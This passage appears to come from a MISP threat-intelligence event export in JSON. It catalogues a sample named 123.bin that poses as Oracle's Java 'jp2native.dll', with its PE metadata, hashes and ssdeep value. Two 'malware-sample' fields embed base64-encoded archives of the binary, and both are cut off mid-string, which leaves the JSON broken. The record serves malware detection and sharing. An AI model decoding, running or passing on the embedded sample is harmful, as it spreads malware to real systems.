"timestamp": "1596394175",
"uuid": "08d7b0ed-85c4-428e-a491-a931a93958d4"
},
{
"comment": "Section 2 of PE",
"object_uuid": "91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"referenced_uuid": "3a117e2f-ba72-4253-aae3-e47373b3b29f",
"relationship_type": "includes",
"timestamp": "1596394227",
"uuid": "b88084a0-cc02-40b7-9f39-b035eb786720"
},
{
"comment": "Section 3 of PE",
"object_uuid": "91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"referenced_uuid": "47b6935a-b4bd-4045-b600-c0a4213d3ec1",
"relationship_type": "includes",
"timestamp": "1596394236",
"uuid": "d8c88d46-5b6a-4443-a31d-204225709f1b"
},
{
"comment": "Section 4 of PE",
"object_uuid": "91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"referenced_uuid": "ae062334-3a88-45b4-9331-ed9a80fc7218",
"relationship_type": "includes",
"timestamp": "1596394247",
"uuid": "dad18b55-9d29-4c70-a7d1-f9694957324d"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "type",
"timestamp": "1596393997",
"to_ids": false,
"type": "text",
"uuid": "455dea2e-3a66-4ad9-b70b-fc623e6694fb",
"value": "exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entrypoint-address",
"timestamp": "1596394007",
"to_ids": false,
"type": "text",
"uuid": "6780a143-c05a-4cff-b140-bccb3fb8d055",
"value": "268451313"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "compilation-timestamp",
"timestamp": "1596394008",
"to_ids": false,
"type": "datetime",
"uuid": "2e9cc5b6-f5db-43be-9ef2-6a524a528eea",
"value": "2020-07-13T17:36:13+00:00"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "original-filename",
"timestamp": "1596394031",
"to_ids": true,
"type": "filename",
"uuid": "5a5942a0-8c5b-482a-8878-cd3116506355",
"value": "jp2native.dll"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "internal-filename",
"timestamp": "1596394031",
"to_ids": true,
"type": "filename",
"uuid": "0271abfe-9a8b-4881-be6b-aca0099cce56",
"value": "jp2native"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-description",
"timestamp": "1596394043",
"to_ids": false,
"type": "text",
"uuid": "c16b37a1-d868-4cf7-97b0-e14f262b5643",
"value": "Java(TM) Platform SE binary"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-version",
"timestamp": "1596394044",
"to_ids": false,
"type": "text",
"uuid": "b397ffba-e310-4a90-a171-ffc5c4a89612",
"value": "11.172.2.11"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "lang-id",
"timestamp": "1596394044",
"to_ids": false,
"type": "text",
"uuid": "68e73d0d-fc75-45d4-b9b4-94a56b4ec8a1",
"value": "040904e4"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-name",
"timestamp": "1596394055",
"to_ids": false,
"type": "text",
"uuid": "c8c8e884-59e0-4bd7-a7c4-f2c7268b5aea",
"value": "Java(TM) Platform SE 8 U172"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-version",
"timestamp": "1596394055",
"to_ids": false,
"type": "text",
"uuid": "fad7162e-0b70-464b-8004-9be3916d6f87",
"value": "8.0.1720.11"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "company-name",
"timestamp": "1596394055",
"to_ids": false,
"type": "text",
"uuid": "8ca58cde-7245-4d0c-b30a-26177653b338",
"value": "Oracle Corporation"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "legal-copyright",
"timestamp": "1596394065",
"to_ids": false,
"type": "text",
"uuid": "d1d4f315-33c4-4ef1-89df-c7b2d2cbf358",
"value": "Copyright \u00c2\u00a9 2018"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "number-sections",
"timestamp": "1596394066",
"to_ids": false,
"type": "counter",
"uuid": "53b1c6e6-e4a9-4a10-8dfb-c98c20101816",
"value": "5"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a Portable Executable",
"meta-category": "file",
"name": "pe",
"template_uuid": "cf7adecc-d4f0-4e88-9d90-f978ee151a07",
"template_version": "5",
"timestamp": "1596394254",
"uuid": "2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"ObjectReference": [
{
"comment": "Section 0 of PE",
"object_uuid": "2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"referenced_uuid": "b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867",
"relationship_type": "includes",
"timestamp": "1596394254",
"uuid": "ba93d791-7864-4c99-a4e1-3f2663e6e714"
},
{
"comment": "Section 1 of PE",
"object_uuid": "2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"referenced_uuid": "2b213ae5-83b6-4e62-b2e9-bb58a3375ef2",
"relationship_type": "includes",
"timestamp": "1596394254",
"uuid": "f3fec5b2-e7cd-4d76-8ee3-69f800441fcb"
},
{
"comment": "Section 2 of PE",
"object_uuid": "2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"referenced_uuid": "78fb4f68-a212-4ba1-af11-4943011c012c",
"relationship_type": "includes",
"timestamp": "1596394254",
"uuid": "bc33b62a-1a8d-4edc-b403-c63ced429333"
},
{
"comment": "Section 3 of PE",
"object_uuid": "2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"referenced_uuid": "0dbb4f9b-5415-4aba-b478-3ae76496cbc0",
"relationship_type": "includes",
"timestamp": "1596394254",
"uuid": "0de4f4c0-9b6f-4886-b2e2-2ca0d12fbad5"
},
{
"comment": "Section 4 of PE",
"object_uuid": "2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"referenced_uuid": "072b4d8e-b602-458e-9a96-71242a752828",
"relationship_type": "includes",
"timestamp": "1596394254",
"uuid": "80d0711d-5f72-48e1-901f-5a3651d2481f"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "type",
"timestamp": "1596394044",
"to_ids": false,
"type": "text",
"uuid": "62fe2fc0-51de-47aa-8cd5-65d1b1ac2380",
"value": "exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entrypoint-address",
"timestamp": "1596394055",
"to_ids": false,
"type": "text",
"uuid": "8cc04d2d-1b7f-4df6-bfb8-87b79b1f2e95",
"value": "268451313"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "compilation-timestamp",
"timestamp": "1596394055",
"to_ids": false,
"type": "datetime",
"uuid": "df67bcee-0e63-4a57-897b-cfc7825ee25d",
"value": "2020-07-13T17:36:13+00:00"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "original-filename",
"timestamp": "1596394066",
"to_ids": true,
"type": "filename",
"uuid": "d28650be-819f-4647-a106-faa46cb7fcb6",
"value": "jp2native.dll"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "internal-filename",
"timestamp": "1596394066",
"to_ids": true,
"type": "filename",
"uuid": "600b974e-9b7c-476f-903f-276047b17d70",
"value": "jp2native"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-description",
"timestamp": "1596394066",
"to_ids": false,
"type": "text",
"uuid": "570e6c8b-af59-4beb-8f87-bd63e7dcbc81",
"value": "Java(TM) Platform SE binary"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-version",
"timestamp": "1596394066",
"to_ids": false,
"type": "text",
"uuid": "32adcb0c-f7e6-4aab-b43f-39a472e91c48",
"value": "11.172.2.11"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "lang-id",
"timestamp": "1596394066",
"to_ids": false,
"type": "text",
"uuid": "26d22746-9293-4486-b209-6dd67e68989f",
"value": "040904e4"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-name",
"timestamp": "1596394066",
"to_ids": false,
"type": "text",
"uuid": "439bdec8-7457-4e38-81b8-d66f3e3780d0",
"value": "Java(TM) Platform SE 8 U172"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-version",
"timestamp": "1596394066",
"to_ids": false,
"type": "text",
"uuid": "e8997d3c-3708-4066-8638-ea068604d873",
"value": "8.0.1720.11"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "company-name",
"timestamp": "1596394066",
"to_ids": false,
"type": "text",
"uuid": "6e1c1ddc-328b-4f22-a711-04af2f635a51",
"value": "Oracle Corporation"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "legal-copyright",
"timestamp": "1596394066",
"to_ids": false,
"type": "text",
"uuid": "4439c282-8c7f-419b-8d21-2b712b0f8079",
"value": "Copyright \u00c2\u00a9 2018"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "number-sections",
"timestamp": "1596394066",
"to_ids": false,
"type": "counter",
"uuid": "978bf464-4877-418d-a01d-80931e15bf81",
"value": "5"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1596394254",
"uuid": "7b2b9772-9059-4651-84e8-bc066e15b917",
"ObjectReference": [
{
"comment": "PE indicators",
"object_uuid": "7b2b9772-9059-4651-84e8-bc066e15b917",
"referenced_uuid": "91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"relationship_type": "includes",
"timestamp": "1596394254",
"uuid": "41f475bd-e04a-4d9f-a3ca-f007b66d829a"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1596394066",
"to_ids": true,
"type": "filename",
"uuid": "c2f49e9f-f7f8-4d1f-8e07-c4f1e88f717d",
"value": "123.bin"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596394066",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "e3ae0a04-7141-407c-864c-83ef5f22480e",
"value": "212992"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596394066",
"to_ids": false,
"type": "float",
"uuid": "17d9b93e-6af9-4cab-9cf8-b67acd0fc6fb",
"value": "7.7070672845015"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596394066",
"to_ids": true,
"type": "md5",
"uuid": "1da6226c-7ca7-4d0a-a171-3ab53b87f791",
"value": "3994131da9d08aa5ca8b4fc671d4c9db"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596394077",
"to_ids": true,
"type": "sha1",
"uuid": "9d1330d5-2520-4654-ba86-0098c85142d6",
"value": "55fc3f8108e5a563ea00cd3abc9a5672d3d58ec5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596394088",
"to_ids": true,
"type": "sha256",
"uuid": "0cea93f4-3dc0-4204-a9b7-46f21acbc6a9",
"value": "e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596394099",
"to_ids": true,
"type": "sha512",
"uuid": "3ce81007-3754-4777-acae-90ee1934122c",
"value": "02fd82498bef4442ca0a6a5348a9f612c852e901522ec8c69d7f1dfdbe2607cc72bbb727c474e60314b1c5bb5c621a3347b87bb3c92ca2c194473e58debfd1a1"
},
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1596394113",
"to_ids": true,
"type": "malware-sample",
"uuid": "a3d6fa9f-5144-4dae-81b5-f7c3265c59c0",
"value": "123.bin|3994131da9d08aa5ca8b4fc671d4c9db"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "mimetype",
"timestamp": "1596394150",
"to_ids": false,
"type": "mime-type",
"uuid": "c6d214b8-3bfd-4d6f-902a-68adeea83f26",
"value": "application/x-dosexec"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596394150",
"to_ids": true,
"type": "ssdeep",
"uuid": "bb6a60f7-aa35-4973-983b-b90027aaec1b",
"value": "6144:BKzJkuYHxK6BGiK1kz6q3Gy+2GcsIUo8Ewqbwk9oSp:Azr8jBoij+2G0BDwkoSp"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1596394254",
"uuid": "63b24626-a14c-4bf1-951d-fd726a7fdac2",
"ObjectReference": [
{
"comment": "PE indicators",
"object_uuid": "63b24626-a14c-4bf1-951d-fd726a7fdac2",
"referenced_uuid": "2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"relationship_type": "includes",
"timestamp": "1596394254",
"uuid": "6c9e5adb-4b73-47e0-97e2-056c0a850e46"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1596394088",
"to_ids": true,
"type": "filename",
"uuid": "1de2959e-3d21-4ffe-94ac-459b6ef5e1c2",
"value": "123.bin"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596394088",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "d436cae8-a49d-40d3-93d2-524ba4e0b6a5",
"value": "212992"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596394099",
"to_ids": false,
"type": "float",
"uuid": "fda8a10f-967e-48a9-a43b-cb785418e538",
"value": "7.7070672845015"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596394099",
"to_ids": true,
"type": "md5",
"uuid": "a0aa4b02-3509-4fb3-8f99-d072ab61ab44",
"value": "3994131da9d08aa5ca8b4fc671d4c9db"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596394113",
"to_ids": true,
"type": "sha1",
"uuid": "794b9c4f-c96a-4c27-975a-b830976659dd",
"value": "55fc3f8108e5a563ea00cd3abc9a5672d3d58ec5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596394126",
"to_ids": true,
"type": "sha256",
"uuid": "ae63b9cc-1b4e-4942-923d-4e71cfa2a92d",
"value": "e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596394139",
"to_ids": true,
"type": "sha512",
"uuid": "d5f73f7a-db6b-4dcf-8213-a6696c499792",
"value": "02fd82498bef4442ca0a6a5348a9f612c852e901522ec8c69d7f1dfdbe2607cc72bbb727c474e60314b1c5bb5c621a3347b87bb3c92ca2c194473e58debfd1a1"
},
{
"category": "Payload delivery",
"comment": "",
"data": "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